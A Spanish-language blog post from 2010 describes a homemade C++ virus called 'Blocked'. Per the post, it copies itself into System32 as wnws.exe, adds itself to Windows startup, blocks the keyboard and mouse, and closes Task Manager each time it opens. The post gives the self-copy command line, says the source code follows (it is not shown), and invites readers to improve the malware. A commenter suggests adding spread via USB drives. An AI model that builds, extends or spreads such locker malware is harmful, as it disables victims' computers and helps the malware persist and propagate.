jueves, 8 de julio de 2010

Virus "Blocked" en C++ | Codigo Fuente

Hoy he decidido publicar este pequeño virus hecho en C++ consiste en autocopiarse en la carpeta C:\Windows\System32\ (%windir%\system32\), bloquea el teclado y el mouse hasta que la victima reinicie, sin embargo al darme cuenta de este fallo decidi tambien agregar el virus al inicio de windows para que asi al iniciar sesion vuelva a bloquear el teclado y el mouse, pero resulta que se puede abrir el Administrador de tareas (taskmgr.exe) con la combinacion de teclas Ctrl+Alt+Supr pero tambien solucione esto, cerrando el Administrador de Tareas cada vez que se intenta abrir.

Sin embargo el virus sigue teniendo sus vunerabilidades por ejemplo si le cambias el nombre al ejecutable que en este caso si llegas a compilar el virus debes nombrarlo Virus.exe ya que si no lo haces no podra autocopiarse, porque dira que el archivo no existe.

Si deseas ponerle otro nombre necesitarias modificar esta linea:
char rute[100] = "copy /y Virus.exe %windir%\\system32\\wnws.exe";
y cambiar Virus.exe por el nombre que le vayas a poner cuando lo compiles.

En fin si alguien encuentra la forma de mejorar este virus y nos lo quiere compartir puede hacerlo ya sea contactandome o directamente en un comentario en el blog.

Aqui el codigo fuente:


Este virus fue compilado en Dev-C++ para descargar esta IDE puedes visitar este post o tambien puedes descargar la version completa Aqui.

3 Comentarios:

Anónimo dijo...

Ya puse la dirección, espero que puedas verlo.
http://sites.google.com/site/zspfreefiles/
El archivo .gz en la descarga, no contiene ejecutables, solamente archivos en formato pdf.

Hack Diseño® dijo...

Hola guanasoft la direccion que pones no funciona, sin embargo no especificas a que refieres o para que es la direccion, espero pronto me puedas decir para que es la direccion.

Hasta luego!!

Unknown dijo...

esta bonito el code :D
yo los puedo crear en vb6,vbs,js,batch pero nunca he creado uno en c++ voy a investigar como hacer para devolver la ruta completa del virus en vb es(App.path+App.exeName+".exe")con esto tendremos la ruta completa sin importar el nombre que tenga y en donde se encuentre faltaría buscar su equivalente en c++ y también le falta algo de propagación alguna función que detecte unidades extraibles(todo tipo de memory flash)para asi que se distribuya con esto quedaría mucho mejor!!!

Publicar un comentario

¡Hola!
Gracias por visitar mi blog.
Espero y no sea tu ultima visita.
Deja un comentario, sugerencia, observacion o lo que quieras.

P.D.:Ya no se pueden realizar comentarios anonimos desde que aqui por razones de seguridad, pero puedes utilizar get-box para dejar un comentario con tu nombre y tu mail o url o tambien puedes dar clic en el boton Contacto.